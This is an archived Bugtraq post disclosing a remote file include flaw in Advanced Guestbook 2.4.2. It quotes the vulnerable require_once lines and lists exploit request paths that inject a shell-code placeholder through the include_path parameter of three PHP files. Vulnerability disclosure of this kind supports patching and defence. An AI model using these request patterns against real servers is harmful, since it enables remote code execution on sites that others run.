Bugtraq mailing list archives
Advanced Guestbook <=- 2.4.2 (include_path) Remote File Include Vulnerability
From: "me you" <r.5.7 () hotmail com>
Date: Tue, 23 Jan 2007 08:52:30 +0000
###################################################Advanced Guestbook <=- 2.4.2 (include_path) Remote File Include Vulnerability
Script: Advanced Guestbook Version: 2.4.2 URL: http://proxy2.de/js/dl86d7a2.php Found By : BorN To K!LL ################################################### Bug in : index.php , addentry.php , picture.php code :. require_once $include_path."/admin/config.inc.php"; require_once $include_path."/lib/$DB_CLASS"; require_once $include_path."/lib/image.class.php"; require_once $include_path."/lib/template.class.php"; ################################################### Explo!T: ^^^^^ /index.php?include_path=[SHe1L-CoDe] /addentry.php?include_path=[SHe1L-CoDe] /picture.php?include_path=[SHe1L-CoDe] ################################################### GreeTz :.Dr.2 , Asbmay , General C , ToOoFa , SHiKaA , ThE-LoRd-Of-CrAcKiNg , str0ke ..
################################################### _________________________________________________________________Don't just search. Find. Check out the new MSN Search! http://search.msn.click-url.com/go/onm00200636ave/direct/01/
Current thread:
- Advanced Guestbook <=- 2.4.2 (include_path) Remote File Include Vulnerability me you (Jan 23)
- Re: Advanced Guestbook <=- 2.4.2 (include_path) Remote File Include Vulnerability Stefano Zanero (Jan 24)